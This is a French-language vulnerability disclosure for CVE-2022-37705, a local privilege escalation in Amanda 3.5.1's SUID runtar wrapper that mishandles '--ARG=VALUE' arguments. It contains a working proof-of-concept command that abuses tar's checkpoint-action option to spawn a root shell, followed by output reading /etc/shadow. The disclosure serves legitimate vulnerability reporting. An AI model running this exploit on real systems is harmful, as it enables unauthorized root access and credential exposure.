
Amanda 3.5.1 second LPE.
[Description suggérée] Une faille d'élévation de privilèges a été découverte dans Amanda 3.5.1, permettant de passer de l'utilisateur backup aux privilèges root. Le composant vulnérable est le SUID runtar, qui est simplement un wrapper pour exécuter /usr/bin/tar avec des arguments spécifiques contrôlables par l'attaquant. Le programme ne vérifie pas correctement les arguments passés au binaire tar (il suppose que tous les arguments doivent être de la forme --ARG VALEUR mais on peut fournir --ARG=VALUE comme un seul argument).
[Informations supplémentaires] Cette faille peut être utilisée pour l'exécution de code, le déni de service, l'élévation de privilèges et la divulgation d'informations. Voici la preuve de concept (PoC) pour l'exploiter et obtenir un shell root : backup@maher:/lib/amanda$ id uid=34(backup) gid=34(backup) groups=34(backup),6(disk),26(tape)
backup@maher:/lib/amanda$ head /etc/shadow head: cannot open '/etc/shadow' for reading: Permission denied
backup@maher:/lib/amanda$ ./runtar NOCONFIG tar --create --file=/dev/null --checkpoint=1 --directory=. --checkpoint-action=exec=/bin/sh /dev/null tar: Removing leading `/' from member names
head /etc/shadow
root:!:19132:0:99999:7::: daemon::19101:0:99999:7::: bin::19101:0:99999:7::: sys::19101:0:99999:7::: sync::19101:0:99999:7::: games::19101:0:99999:7::: man::19101:0:99999:7::: lp::19101:0:99999:7::: mail::19101:0:99999:7::: news:*:19101:0:99999:7:::
[Autre type de vulnérabilité] Vérification incorrecte des arguments.
[Vendeur du produit] Amanda
[Base de code du produit affecté] runtar - 3.5.1
[Composant affecté] Le binaire SUID affecté est : runtar Le fichier affecté est : runtar.c Les lignes de code affectées commencent à la ligne 162.
[Type d'attaque] Locale
[Impact Exécution de code] true
[Impact Déni de service] true
[Impact Élévation de privilèges] true
[Impact Divulgation d'informations] true
[Vecteurs d'attaque] Pour exploiter le binaire, il suffit de fournir des arguments spécialement conçus au binaire SUID runtar pour escalader vers root.
[Référence] http://www.amanda.org/
[Découvreur] Maher Azzouzi
Utilisez CVE-2022-37705.